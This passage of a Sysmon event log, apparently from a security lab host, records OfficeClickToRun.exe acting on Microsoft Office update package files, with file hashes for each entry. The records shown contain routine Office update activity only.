Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\outlookmui.msi.16.en-us.boot.tree.datMD5=A35B70DAF197679DC45E6165CBCAB962,SHA256=F7DDEC49239CB1CDAF8DF883ECD9667A244138BC70F00600FB2ECD2176DC55ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\outlook.x-none.msi.16.x-none.tree.datMD5=0122D15C2183583AA18C399D629BF05F,SHA256=9A6D5DBB723E18D4E08B88C6055867B8EFB10B9712E316A2944743A1D3BB8634,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\outlook.x-none.msi.16.x-none.boot.tree.datMD5=8CCDF2F7B243179AB61276803598480A,SHA256=79DE1D721AB1188E60B41CD6A3CFE90090EA53F9E256C9B97218E697A26F714A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osmuxmui.msi.16.en-us.tree.datMD5=86EE5F6D680226A34BCAC5C13991503C,SHA256=A4E4BEF1BAC3A06730244A06B8E0F91FC2F7FC1740F6C7CA7BD347DC4A6689E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osmuxmui.msi.16.en-us.boot.tree.datMD5=445117D5E8B5F3FFB39EA050ED3D55FD,SHA256=30496B5A71257B04E143AFD018FA042ACAEB85FB14D9748D3C4A80708E6D92A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osmux.x-none.msi.16.x-none.tree.datMD5=B80A4BC50381240B796CB0C7CAC83754,SHA256=FF0863F19E6DA646F83BD5627EED6746A53BB7B8462281E043C84732702677A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osmux.x-none.msi.16.x-none.boot.tree.datMD5=78E5CC77908B886E07C1A1B92804B5A9,SHA256=0DA413C577239E3EA81751A2B56C1C01D03C5B36809F8D85B354D0FEDCD78938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osmmui.msi.16.en-us.tree.datMD5=2E7B0E8268600412D03B612E5870D10D,SHA256=8D5735503C87450A88D394B3AF6589A77507D5F5AD864BEDC2873A86AECA2C86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osmmui.msi.16.en-us.boot.tree.datMD5=434886732C2A629796A2A3246A1EFA1C,SHA256=8D80B2DE19F96B681F06338C1594D577EA69E32E066EC593346D31A6376D9B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osm.x-none.msi.16.x-none.tree.datMD5=79149BFA47EB93E905337BFED5A2DE88,SHA256=D33D2CFE119DA066F467036511AD769F2530CBF70C636481037F15634B3BC7D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\osm.x-none.msi.16.x-none.boot.tree.datMD5=308834FD7505F5E4F11F7C098FA3BDDA,SHA256=7DEF351B2AE492B81B659178BE91DE217DBDA129779B9D9B35B789455B6AB61F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\onenotemui.msi.16.en-us.tree.datMD5=8B1004035BE7F002CAB66D86F3D608C8,SHA256=61E305443CC2316072F109316081FB9F4D0127B11A09875D2A96D3BEA9F15783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\onenotemui.msi.16.en-us.boot.tree.datMD5=6372D8F2A42D773B208AC08DC0702122,SHA256=293FAB74262641CE74980D9561E27775100B32E43E5440144B9037323684087C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\onenote.x-none.msi.16.x-none.tree.datMD5=DF9209CEC534E5134B6C5A99D1676183,SHA256=A9473F50A6747188EB3651D056E2B2B04D11D106A10D1828CDF4EEB2236C8D4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\onenote.x-none.msi.16.x-none.boot.tree.datMD5=69ED6576BA751BADC5FE99234948A1A4,SHA256=E099C93D8B1F0F22F68693C9090C9F73CCE6AA25CD06ECF90164E8471AB25F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\officemuiset.msi.16.en-us.tree.datMD5=CAB97EF33B406CE1CD99A79E271C9CE5,SHA256=98B15D5998E99BD9645D87D8B6DA8CDA1C7CCA49B2BC751DEA3BD2B67256FEAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\officemuiset.msi.16.en-us.boot.tree.datMD5=E2D31F675D921B9CCB7329F084963A33,SHA256=75C0C9C8E654F73D7928864F90766247094A71023498BE7D35F8AFE5C0562D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\officemui.msi.16.en-us.tree.datMD5=251A179B495CC992973A71356073EDFA,SHA256=81DC6F93F4D6AE66FFE4BC8D3FEAC5D6CB297D949F942353CCC544907A33050A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\officemui.msi.16.en-us.boot.tree.datMD5=62C29945CEF7EED13703960E8DA1DFBA,SHA256=64842FF2D4416868931742B1AEAA9684DA42092C64580F191D19C1561B70CE0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\office32ww.msi.16.x-none.tree.datMD5=BB912B645B300F16F4A89A78B70194A7,SHA256=1A7507B5B8E78E6907770662DB4CAE185569741B03389435BB432B1878D96943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\office32ww.msi.16.x-none.boot.tree.datMD5=5AF4C5542CA8AD993EBF39EE115FFE0C,SHA256=D13CF0615F5CF6763D15FBC19C3065066C793AFD1DF0EE6C77D9ABB61CAA221F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\office32mui.msi.16.en-us.tree.datMD5=C53576E29C720E25E53E239F738E26BA,SHA256=AF5788E5634E209107565F3B7F1EE6EA3A5DADDE8F348E54365391AACF4E71B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\office32mui.msi.16.en-us.boot.tree.datMD5=CA5D34EF256B1240401ECA6C3C88DF20,SHA256=178518C007AF086CADFA97F2FF08EA85FED69C7A9856B5504E41797D86C3D681,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\office.x-none.msi.16.x-none.tree.datMD5=7F770290467CD1EE84821CFEE6F10492,SHA256=6D0394848D273DDE4C6E47A061E9CE3FBCB1CB8444010566D3B275F3ED22280A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\office.x-none.msi.16.x-none.boot.tree.datMD5=0D49D94624345C40C936D9E28C1479AA,SHA256=A88FE40FD93238FFDF6AAF895367F2FCF9018A9A334047762F6C836B333D7F16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\lyncmui.msi.16.en-us.tree.datMD5=07CF5C3382F78FEA375C4C189F30D53D,SHA256=A3F7D0578A2BB45BDB6B2286664AFBAA37F4BC72CC81AA2269F3401E9AA9713C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\lyncmui.msi.16.en-us.boot.tree.datMD5=6DE52235B2D4A7E4F03C9D521455ABE5,SHA256=C04BDECB526411916C4DE784F8491FB6D47F957105DE8AEA39336B98F58DB481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\lync.x-none.msi.16.x-none.tree.datMD5=2E0BEE66CED52E94F7C10571D4AA44C4,SHA256=B9CEC09DDC96AF4CCB76CF3564C34097D7E12D53AD006AA6FADAAE18ED2588DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\lync.x-none.msi.16.x-none.boot.tree.datMD5=DF9A1CB4387FF83A7B7EFE4B6C062732,SHA256=A10262BEBDB9733F9A57B3E7BE100A743B00CE7A87F95DF0FDF96D377D51D9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\excelmui.msi.16.en-us.tree.datMD5=8FE80EA5CD0F9B1C434B6E0C2EF67EF1,SHA256=02FDA55AFBDF6D8374812CF246CCFBECD7BCE9C72577A047DB0E0D2F7E0EE587,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\excelmui.msi.16.en-us.boot.tree.datMD5=8DFA7FDABFAF856011273E18C3A284DE,SHA256=13033323E03866DC8F350E820CB04094C0ACD78BDEAB0EC6461CA593A4630289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\excel.x-none.msi.16.x-none.tree.datMD5=0E8C0A17DB42E38E3155FDE734F93C35,SHA256=3F1966B16F5E64D2DEF58D75BC7C89609B2B7EBFB12A3579466AB63F5EB4BF0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\excel.x-none.msi.16.x-none.boot.tree.datMD5=1A1DA88B2E2BB6B22983BB34844585B4,SHA256=E65E784779232276A22BC92D98093ACCAD8827A89661B237600F2F87A3BC82D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\dcfmui.msi.16.en-us.tree.datMD5=BBA2DB7E8D2080B01470635D9F1FF91F,SHA256=88BD33548B8D2E7BFB84C12C3AEF07D196573BD87DE1F357E019BD010822356C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\dcfmui.msi.16.en-us.boot.tree.datMD5=29DABC624EA2507A78E033E1A42F4A7D,SHA256=E8F3737D9661957AD2DC9547AD17A0D5D8C319A61882A9DA40E0C78DD5461E8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\dcf.x-none.msi.16.x-none.tree.datMD5=44BFACA365B1AD286CEDF9C60D1C3C63,SHA256=9DC7947D7F5926F8F74C1390A5B1F4B9659EDB9A71F05E9FB628E55883A6F8FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\dcf.x-none.msi.16.x-none.boot.tree.datMD5=6C807121CDD1676E007E4777E54D1B0B,SHA256=4BF94D16CE6ED746130B28C858A094784A3FEFD8193CCD4F884751505D0C54CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\accessmuiset.msi.16.en-us.tree.datMD5=730A40344C6B61FB46034152F4ABD510,SHA256=6B05C1A090062338B879290B7F45BF4D70CA00FD87323F99A1170B5B4BB2521D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\accessmuiset.msi.16.en-us.boot.tree.datMD5=8CE457D4E3425087845851297C3C8D90,SHA256=F1B93CDA509D12BCDDB853BAAEC9403C4CC09D3C4B14FF5BB63B661A8856401B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\accessmui.msi.16.en-us.tree.datMD5=C1E77192423E722DAE9C3FD817F3970A,SHA256=0CFCC5A2704A2B168D8A411945BB675A91BCE310CD502F81FF9D7F4341A76759,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\accessmui.msi.16.en-us.boot.tree.datMD5=C6ABF71501C0A14296D79FFC89FEEE1D,SHA256=4EE9EFD3B3F9245354DF479F5B73F6EF211E0D660DB56FC233B1F4A02233B81C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\access.x-none.msi.16.x-none.tree.datMD5=A720100C1A32067559FCBFD8B30F711B,SHA256=755C0DEF09410F5ECB00C1C7B50FA37CD88BC566146BE74AAC335AC28685E5AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\rsod\access.x-none.msi.16.x-none.boot.tree.datMD5=C90FF3ECD9464E7AE8F708F38D72DA3A,SHA256=F27AA732BE5D65D5F02DA019911F8573206E83C7134FC4F7B25E3C8436146AC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\XML2WORD.XSLMD5=8DF8CA82283292FAD23EABDA8DFA3991,SHA256=DB5065BFE501148D79DDF901BB1A666AC7784EE54C30D7942B741FE16A06B47A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\XLINTL32.COMMON.DLLMD5=23FA9068DE699D154DB17CA2927A0E56,SHA256=658BA2B1F806F02428726086C9EBAE30C9AC31959D59F0995B71B7634E17E16C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 